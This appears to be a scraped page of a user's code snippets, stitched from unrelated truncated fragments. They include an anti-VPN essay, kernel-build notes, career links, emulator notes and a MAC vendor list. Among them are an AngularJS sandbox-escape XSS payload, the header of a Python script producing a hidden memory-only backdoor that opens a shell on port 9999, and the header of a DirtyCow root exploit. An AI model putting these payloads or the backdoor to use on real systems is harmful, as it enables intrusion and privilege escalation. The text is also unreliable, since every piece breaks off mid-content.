cedric cedriczirtacic

Don't use VPN services.

No, seriously, don't. You're probably reading this because you've asked what VPN service to use, and this is the answer.

Note: The content in this post does not apply to using VPN for their intended purpose; that is, as a virtual private (internal) network. It only applies to using it as a glorified proxy, which is what every third-party "VPN provider" does.

A Russian translation of this article can be found here, contributed by Timur Demin.
A Turkish translation can be found here, contributed by agyild.
There's also this article about VPN services, which is honestly better written (and has more cat pictures!) than my article.

#Angular Sandbox Escapes Cheatsheet

Source: XSS without HTML: Client-Side Template Injection with AngularJS

1.0.1 - 1.1.5 Mario Heiderich (Cure53)

{{constructor.constructor('alert(1)')()}}

1.2.0 - 1.2.1

This is the process I followed on my Fedora 23 host machine to build a small/minimal vanilla Linux kernel and test in Qemu (based on this blog post). This will provide a safe sandbox in which to test kernel changes, and is generally faster than developing natively on the host machine. Qemu will boot the kernel image directly in the emulated system.

Install required build tools on host machine

sudo dnf install ncurses-devel kernel-devel kernel-headers gcc gcc-c++ git qemu openssl-devel glibc-static

Prepare a working space for kernel development

How to Build a Successful Information Security Career (Daniel Miessler)
- https://danielmiessler.com/blog/build-successful-infosec-career/#gs.DtVCbbw
The First Steps to a Career in Information Security (Errata Security - Marisa Fagan)
- http://blog.erratasec.com/2010/04/first-steps-to-career-in-information.html#.WFrbofkrIuU
Hiring your first Security Professional (Peerlyst - Dawid Balut)
- https://www.peerlyst.com/posts/hiring-your-first-security-professional-dawid-balut
How to Start a Career in Cyber security
- https://www.concise-courses.com/security/how-to-start-your-career/
How to Get Into Information Security (ISC^2)
https://www.isc2.org/how-to-get-into-information-security.aspx

Emulators

VICE is the best by such a commanding margin that you really needn't look elsewhere. Open source and has the largest community.

However, other options are:

CCS64, Lots of features, but I found it to be painfully slow. Shareware.
Hoxs64. Decent, but not as full-featured as VICE. The ML monitor seems nice.
Frodo is pretty outdated and the author admits as much.
micro64 seems promising but incomplete.

	/*
	robin verton, dec 2015
	implementation of the RC4 algo
	*/

	#include <stdio.h>
	#include <string.h>
	#include <stdlib.h>

	#define N 256 // 2^8

	#!/usr/bin/env python

	# This script prints a simple one-liner memory-only backdoor agent which hides from ps.

	# It renames itself within the process list using a really hackish (AND POTENTIALLY DANGEROUS) /proc/self/mem rewrite
	# and spawns a shell on port 9999. Just an experiment, there are simplest way to run unnoticed in the
	# process list (see the technique used by EmPyre: https://github.com/adaptivethreat/EmPyre)

	template = """
	import sys,re,pty,os,socket

	/*
	* A PTRACE_POKEDATA variant of CVE-2016-5195
	* should work on RHEL 5 & 6
	*
	* (un)comment correct payload (x86 or x64)!
	* $ gcc -pthread c0w.c -o c0w
	* $ ./c0w
	* DirtyCow root privilege escalation
	* Backing up /usr/bin/passwd.. to /tmp/bak
	* mmap fa65a000

	// g++ -lstdc++ -Wno-write-strings fetch.cpp -o fetch
	#ifdef _WIN32 // Windows
	#include <winsock2.h>
	#include <ws2tcpip.h>
	#define MSG_NOSIGNAL 0
	#else // Linux + Mac

	#include <sys/types.h>
	#include <sys/socket.h>
	#include <netinet/in.h>

	000000 Officially Xerox
	000001 SuperLAN-2U
	000002 BBN (was internal usage only, no longer used)
	000003 XEROX CORPORATION
	000004 XEROX CORPORATION
	000005 XEROX CORPORATION
	000006 XEROX CORPORATION
	000007 XEROX CORPORATION
	000008 XEROX CORPORATION
	000009 powerpipes?